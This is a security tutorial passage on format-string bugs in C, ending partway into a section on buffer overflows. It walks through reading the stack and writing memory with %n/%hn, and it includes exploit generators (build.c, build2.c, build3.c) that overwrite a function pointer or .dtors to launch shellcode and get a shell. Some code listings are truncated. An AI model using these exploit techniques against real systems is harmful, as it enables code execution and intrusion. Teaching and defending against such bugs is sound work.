Figure 1 describes the state of the stack when the program enters the snprintf() function (we’ll see that it is not true … but this is just to give you an idea of what’s happening). We don’t care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values located in %ebp and %ebp+4 contain the respective backups of the %ebp and %ebp+4 registers. Next come the arguments of the function snprintf():

  1. the destination address;
  2. the number of characters to be copied;
  3. the address of the format string argv[1] which also acts as data.

Lastly, the stack is topped of with the tmp array of 4 characters , the 64 bytes of the variable buffer and the i integer variable .

The argv[1] string is used at the same time as format string and data. According to the normal order of the snprintf() routine, argv[1] appears instead of the format string. Since you can use a format string without format directives (just text), everything is fine :)

What happens when argv[1] also contains formatting ? ? Normally, snprintf() interprets them as they are … and there is no reason why it should act differently ! But here, you may wonder what arguments are going to be used as data for formatting the resulting output string. In fact,snprintf() grabs data from the stack! You can see that from our stack program:

>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)

First, the “123 ” string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number according to our little endian x86 processor.

>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)

Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the 4 first bytes of buffer. However, buffer contains the “123 ” string, which can be seen as the 0x20333231 (0x20=space, 0x31=’1’…) hexadecimal number. So, for each %x, snprintf() “jumps” 4 bytes further in buffer (4 because unsigned int takes 4 bytes on x86 processor). This variable acts as double agent by:

  1. writing to the destination;
  2. read input data for the format.

We can “climb up” the stack as long as our buffer contains bytes:

>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378
         0x333837] (63)
i = 1 (bffff654)

Even higher

The previous method allows us to look for important information such as the return address of the function who created the stack holding the buffer. However, it is possible, with the right format, to look for data further than the vulnerable buffer.

You can find an occasionally useful format when it is necessary to swap between the parameters (for instance, while displaying date and time). We add the m$ format, right after the %, where m is an integer >0. It gives the position of the variable to use in the arguments list (starting from 1):

/* explore.c */
#include <stdio.h>

main(int argc, char **argv) {

  char buf[12];

  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);

  printf("[%s] (%d)\n", buf, strlen(buf));

The format using m$ enables us to go up where we want in the stack, as we could do using gdb:

>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)

The character \ is necessary here to protect the $ and to prevent the shell from interpreting it. In the first three calls we visit contents of the bufvariable. With %4\$x, we get the %ebp saved register, and then with the next %5\$x, the %eip saved register (a.k.a. the return address). The last 2 results presented here show the argc variable value and the address contained in *argv (remember that **argv means that *argv is an addresses array).

In short …

This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return value of a function, an address… However, we saw at the beginning of this article that we could write using functions of the printf()‘s type: doesn’t this look like a wonderful potential vulnerability ?

First steps

Let’s go back to the stack program:

>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)

We give as input string:

  1. the i variable address;
  2. a formatting instruction (%.496x);
  3. a second formatting instruction (%n) which will write into the given address.

To determine the i variable address (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can note it, i has a new value :) The given format string and the stack organization make snprintf() look like :

         sizeof buffer,
         4 first bytes in buffer);

The first four bytes (containing the i address) are written at the beginning of buffer. The %.496x format allows us to get rid of the tmp variable which is at the beginning of the stack. Then, when the formatting instruction is the %n, the address used is the i‘s one, at the beginning ofbuffer. Although the precision required is 496, snprintf writes only sixty bytes at maximum (because the length of the buffer is 64 and 4 bytes have already been written). The value 496 is arbitrary, and is just used to manipulate the “byte counter”. We have seen that the %n format saves the amount of bytes that should have been written. This value is 496, to which we have to add 4 from the 4 bytes of the i address at the beginning of buffer. Therefore, we have counted 500 bytes. This value will be written into the next address found in the stack, which is the i‘s address.

We can go even further with this example. To change i, we needed to know its address … but sometimes the program itself provides it:

/* swap.c */
#include <stdio.h>

main(int argc, char **argv) {

  int cpt1 = 0;
  int cpt2 = 0;
  int addr_cpt1 = &cpt1;
  int addr_cpt2 = &cpt2;

  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);

Running this program shows that we can control the stack (almost) as we want:

>>./swap AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
cpt1 = 4
cpt2 = 0

As you can see, depending on the argument, we can change either cpt1, or cpt2. The %n format expects an address, that is why we can’t directly act on the variables, ( i.e. using %3$n (cpt2) or %4$n (cpt1) ) but have to go through pointers. The latter are “fresh meat” with enormous possibilities for modification.

Variations on the same topic

The examples previously presented come from a program compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won’t get the same results on your own box. Indeed, the functions of the *printf() type change according to the glibc and the compilers do not carry out the same operations at all.

The program stuff highlights these differences:

/* stuff.c */
#include <stdio.h>

main(int argc, char **argv) {

  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";

  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);

  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

The aaa and bbb arrays are used as delimiters in our journey through the stack. Therefore we know that when we find 424242, the following bytes will be in buffer. Table 1 presents the differences according to the versions of the glibc and compilers.

Tab. 1 : Variations around glibc
Compiler glibc Display
gcc-2.95.3 2.1.3-16 buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63)
egcs-2.91.66 2.1.3-22 buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63)
gcc-2.96 2.1.92-14 buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)
gcc-2.96 2.2-12 buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)

Next in this article, we will continue to use egcs-2.91.66 and the glibc-2.1.3-22 , but don’t be surprised if you note differences on your machine.

Exploitation of a format bug

While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.

With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, …), we just have to say where and what to write for %ndoing the job for us.

The vulnerable program

You can exploit a format bug different ways. P. Bouchareine’s article (Format string vulnerability) shows how to overwrite the return address of a function, so we’ll show something else.

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
  char buffer[128];
  int (*ptrf)();

  memset(buffer, 0, sizeof(buffer));

  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);

  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

  return ptrf();

int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    printf("%d %p\n",i,argv[i]);


int helloWorld()
  printf("Welcome in \"helloWorld\"\n");
  return 0;

int accessForbidden()
  printf("You shouldn't be here \"accesForbidden\"\n");
  return 0;

We define a variable named ptrf which is a pointer to a function. We will change the value of this pointer to run the function we choose.

First example

First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:

>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"

>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"

The first call here gives us what we need: 3 words (one word = 4 bytes for x86 processors) separate us from the beginning of the buffervariable. The second call, with AAAA%3\$x as argument, confirms this.

Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, something like 128Mbytes). All computers can’t afford such a use of memory … but the one we are using can :) It last around 20 seconds on a dual-pentium 350 MHz:

>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"

What did we do? We just provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack, with a precision of 134514256 (we already have written 4 bytes from the address of ptrf, so we still have to write 134514260-4=134514256 bytes). At last, we write the wanted value in the given address (%3$n).

Memory problems: divide and conquer

However, as we mentioned it, it isn’t always possible to use 128MB buffers. The format %n waits for a pointer to an integer, i.e. four bytes. It is possible to alter its behavior to make it point to a short int – only 2 bytes – thanks to the instruction %hn. We thus cut the integer to which we want to write two parts. The largest writable size will then fit in the 0xffff bytes (65535 bytes). Thus in the previous example, we transform the operation writing ” 0x8048654 at the 0xbffff5d4 address” into two successive operations : :

  • writing 0x8654 in the 0xbffff5d4 address
  • writing 0x0804 in the 0xbffff5d4+2=0xbffff5d6 address

The second write operation takes place on the high bytes of the integer, which explains the swap of 2 bytes.

However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. First, we have to write the smallest value between the two. Then, the second formatting will only use the difference between the needed number and the first number written as precision. For instance in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 – 0x0804). Each %hn placed right after will record the right amount of bytes.

We just have to specify where to write to both %hn. The m$ operator will greatly help us. If we save the addresses at the beginning of the vulnerable buffer, we just have to go up through the stack to find the offset from the beginning of the buffer using the m$ format. Then, both addresses will be at an offset of m and m+1. As we use the first 8 bytes in the buffer to save the addresses to overwrite, the first written value must be decreased by 8.

Our format string looks like:

"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max - val. min.]x%[offset+1]$hn"The build program uses three arguments to create a format string:

  1. the address to overwrite;
  2. the value to write there;
  3. the offset (counted as words) from the beginning of the vulnerable buffer.
/* build.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

   The 4 bytes where we have to write are placed that way :
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
char* build(unsigned int addr, unsigned int value,
      unsigned int where) {

  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128;
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;

  char *buf;

  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom

  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
  memset(buf, 0, length);

  /* let's build */
  if (valh < vall) {

         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */

         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         valh-8,              /* set the value for the first %hn */
         where,               /* the %hn for the high part */

         vall-valh,           /* set the value for the second %hn */
         where+1              /* the %hn for the low part */

  } else {

         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */

         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         vall-8,              /* set the value for the first %hn */
         where+1,             /* the %hn for the high part */

         valh-vall,           /* set the value for the second %hn */
         where                /* the %hn for the low part */
  return buf;

main(int argc, char **argv) {

  char *buf;

  if (argc < 3)
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
          strtoul(argv[2], NULL, 16),  /* valeur */
          atoi(argv[3]));              /* offset */

  fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;

The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let’s check what we get now, without any memory troubles.

First, our simple example allows us guessing the offset:

>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"

It is always the same : 3. Since our program is done to explain what happens, we already have all the other information we would need : theptrf and accesForbidden() addresses . We build our buffer according to these:

>>./vuln `./build 0xbffff5d4 0x8048664 3`
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"

Nothing happens! In fact, since we used a longer buffer than in the previous example in the format string, the stack moved. ptrf has gone from0xbffff5d4 to 0xbffff5b4). Our values need to be adjusted:

>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"

We won!!!

Other exploits

In this article, we started by proving that the format bugs are a real vulnerability. Another important concern is how to exploit them. Buffer overflow exploits rely on writing to the return address of a function. Then, you have to try (almost) at random and pray a lot for your scripts to find the right values (even the eggshell must be full of NOP). You don’t need all this with format bugs and you are no more restricted to the return address overwriting.

We have seen that format bugs allow us to write anywhere. So, we will see now an exploitation based on the .dtors section.

When a program is compiled with gcc, you can find a constructor section (named .ctors) and a destructor (named .dtors). Each of these sections contains pointers to functions to be carried out before entering the main() function and after exiting, respectively.

/* cdtors */

void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));

int main() {
  printf("in main()\n");

void start(void) {
  printf("in start()\n");

void end(void) {
  printf("in end()\n");

Our small program shows that mechanism:

>>gcc cdtors.c -o cdtors
in start()
in main()
in end()

Each one of these sections is built in the same way:

>>objdump -s -j .ctors cdtors

cdtors:     file format elf32-i386

Contents of section .ctors:
 804949c ffffffff dc830408 00000000           ............
>>objdump -s -j .dtors cdtors

cdtors:     file format elf32-i386

Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000           ............

We check that the indicated addresses match those of our functions (attention : the preceding objdump command gives the addresses in little endian):

>>objdump -t cdtors | egrep "start|end"
080483dc g     F .text  00000012              start
080483f0 g     F .text  00000012              end

So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.

Let us apply this to vuln by using the format string. First, we have to get the location in memory of these sections, which is really easy when you have the binary at hand ;-) Simply use the objdump like we did previously:

>> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049844 ffffffff 00000000                    ........

Here it is ! We have everything we need now.

The goal of the exploitation is to replace the address of a function in one of these sections with the one of the functions we want to execute. If those sections are empty, we just have to overwrite the 0x00000000 which indicates the end of the section. This will cause a segmentation faultbecause the program won’t find this 0x00000000, it will take the next value as the address of a function, which is probably not true.

In fact, the only interesting section is the destructor section (.dtors): we have no time to do anything before the constructor section (.ctors). Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (the 0xffffffff):

  • if there is no address there, we overwrite the 0x00000000;
  • otherwise, the first function to be executed will be ours.

Let’s go back to our example. We replace the 0x00000000 in section .dtors, placed in 0x8049848=0x8049844+4, with the address of theaccesForbidden() function, already known (0x8048664):

>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664

before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)

Everything runs fine, the main() helloWorld() and then exit. The destructor is then called. The section .dtors starts with the address ofaccesForbidden(). Then, since there is no other real function address, the expected coredump happens.

Please, give me a shell

We have seen simple exploits here. Using the same principle we can get a shell, either by passing the shellcode through argv[] or an environment variable to the vulnerable program. We just have to set the right address (i.e. the address of the eggshell) in the section .dtors.

Right now, we know:

  • how to explore the stack within reasonable limits (in fact, theoretically, there is no limit, but it gets rather painful rather quickly to recover the words on the stack one by one);
  • how to write the expected value to the right address.

However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).

The idea is based on recursive calls of the function exec*():

/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char **argv) {

  char **env;
  char **arg;
  int nb = atoi(argv[1]), i;

  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;

  arg    = (char **) malloc(sizeof(char *) * nb);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;

  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);

  /* recall */
  if (nb == 0)
  execve(argv[0], arg, env);

The input is an nb integer that the program will recursively calle itself nb+1 times:

>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

We immediately notice the allocated addresses for arg and argv don’t move anymore after the second call. We are going to use this property in our exploit. We just have to change our build program slightly to make it call itself before calling vuln. So, we get the exact argv address, and the one of our shellcode.:

/* build2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
  //Same function as in build.c

main(int argc, char **argv) {

  char *buf;
  char shellcode[] =

  if(argc < 3)
    return EXIT_FAILURE;

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    execlp(argv[0], argv[0], buf, &shellcode, argv[1], argv[2], NULL);

  } else {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* adresse */
        atoi(argv[4]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));

    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);

  return EXIT_SUCCESS;

The trick is that we know what to call according to the number of arguments the program received. To start our exploit, we just give to build2the address we want to write to and the offset. We don’t have to give the value anymore since it is going to be evaluated by our successive calls.

To succeed, we need to keep the same memory layout between the different calls of build2 and then vuln (that is why we call the build() function, in order to use the same memory footprint):

>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)

Why didn’t this work ? We said we had to build the exact copy of the memory between the 2 calls … and we didn’t do it ! argv[0] (the name of the program) changed. Our program is first named build2 (6 bytes) and vuln after (4 bytes). There is a difference of 2 bytes, which is exactly the value that you can notice in the example above. The address of the shellcode during the second call of build2 is given by sc=0xbffff88f but the content of argv[2] in vuln gives 20xbffff891: our 2 bytes. To solve this, it is enough to rename our build2 to only 4 letters e.g bui2:

>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)

Won again : that works much better that way ;-) The eggshell is in the stack and we changed the address pointed to by ptrf to have it point to our shellcode. Of course, it can happen only if the stack is executable.

But we have seen that format strings allow us to write anywhere : let’s add a destructor to our program in the section .dtors:

>>objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
80498c0 ffffffff 00000000                    ........
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit

Here, no coredump is created while quitting our destructor. This is because our shellcode contains an exit(0) call.

In conclusion as a last gift, here is build3.c that also gives a shell, but passed through an environment variable:

/* build3.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
  //Même fonction que dans build.c

int main(int argc, char **argv) {
  char **env;
  char **arg;
  unsigned char *buf;
  unsigned char shellcode[] =

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    env = (char **) malloc(sizeof(char *) * 4);
  } else
  if(argc==2) {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* adresse */
        atoi(environ[2]));              /* offset */

    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);

  return 0;

Once again, since this environment is in the stack, we need to take care not to modify the memory (i.e. changing the position of the variables and arguments). The binary’s name must contain the same number of characters as the name of vulnerable program vuln.

Here, we choose to use the global variable extern char **environ to set the values we need:

  1. environ[0]: contains shellcode;
  2. environ[1]: contains the address where we expect to write;
  3. environ[2]: contains the offset.

We leave you , play with it … this (too) long article is already filled with too much source code and test programs.

Conclusion : how to avoid format bugs ?

As shown in this article, the main trouble with this bug comes from the freedom left to a user to build his own format string. The solution to avoid such a flaw is very simple: never leave a user providing his own format string! Most of the time, this simply means to insert a string "%s"when function such as printf(), syslog(), …, are called. If you really can’t avoid it, then you have to check the input given by the user very carefully.


The authors thank Pascal Kalou Bouchareine for his patience (he had to find why our exploit with the shellcode in the stack did not work … whereas this same stack was not executable), his ideas (and more particularly the exec*() trick), his encouragements … but also for his article on format bugs which caused, in addition to our interest in the question, intense cerebral agitation ;-)



… commands1
the word command means here everything that effects the format of the string: the width, the precision, …
… bytes2
the -1 comes from the last character reserved for the ”.

Avoiding security holes when developing an application – Part 3 : buffer overflows

Buffer overflows

In our previous article we wrote a small program of about 50 bytes and we were able to start a shell or exit in case of failure. Now we must insert this code into the application we want to attack. This is done by overwriting the return address of a function and replace it with our shellcode address. You do this by forcing the overflow of an automatic variable allocated in the process stack.

For example, in the following program, we copy the string given as first argument in the command line to a 500 byte buffer. This copy is done without checking if it’s larger than the buffer size. As we’ll see later on, using the strncpy() function allows us to avoid this problem.

  /* vulnerable.c */

  #include <string.h>

  int main(int argc, char * argv [])
    char buffer [500];

    if (argc > 1)
    strcpy(buffer, argv[1]);
    return (0);

buffer is an automatic variable, the space used by the 500 bytes is reserved in the stack as soon as we enter the main() function. When running the vulnerable program with an argument longer than 500 characters, the data overflows the buffer and “invades” the process stack. As we’ve seen before, the stack holds the address of the next instruction to be executed (aka return address). To exploit this security hole, it is enough to replace the return address of the function with the shellcode address we want to execute. This shellcode is inserted into the body buffer, followed by its address in memory.

Position in memory

Getting the memory address of the shellcode is rather tricky. We must discover the offset between the %esp register pointing to the top of the stack and the shellcode address. To benefit from a margin of safety, the beginning of the buffer is filled up with the NOP assembly instruction; it’s a one byte neutral instruction having no effect at all. Thus, when the starting address points before the true beginning of the shellcode, the CPU goes from NOP to NOP till it reaches our code. To get more chance, we put the shellcode in the middle of the buffer, followed by the starting address repeated till the end, and preceded by a NOP block. The diagram 1 illustrates this:

Diag. 1 : buffer especially filled up for the exploit.

Diagram 2 describes the state of the stack before and after the overflow. It causes all the saved information (saved %ebp, saved %eip, arguments,…) to be replaced with the new expected return address: the start address of the part of the buffer where we put the shellcode.

Diag. 2 : state of the stack before and after the overflow
pile_bef.gif pile_aft.gif
Before After

However, there is another problem related to variable alignment within the stack. An address is longer than 1 byte and is therefore stored in several bytes and this may cause the alignment within the stack to not always fit exactly right. Trial and error finds the right alignment. Since our CPU uses 4 bytes words, the alignment is 0, 1, 2 or 3 bytes (check Part 2 = article 183 about stack organization). In diagram 3, the grayed parts correspond to the written 4 bytes. The first case where the return address is overwritten completely with the right alignment is the only one that will work. The others lead to segmentation violation or illegal instruction errors. This empirical way to search works fine since todays computer power allows us to do this kind of testing.

Diag. 3 : possible alignment with 4 bytes words

Launch program

We are going to write a small program to launch a vulnerable application by writing data which will overflow the stack. This program has various options to position the shellcode position in memory and so choose which program to run. This version, inspired by Aleph One article from phrack magazine issue 49, is available from Christophe Grenier’s website.

How do we send our prepared buffer to the target application ? Usually, you can use a command line parameter like the one in vulnerable.c or an environment variable. The overflow can also be caused by typing in the data or just reading it from a file.

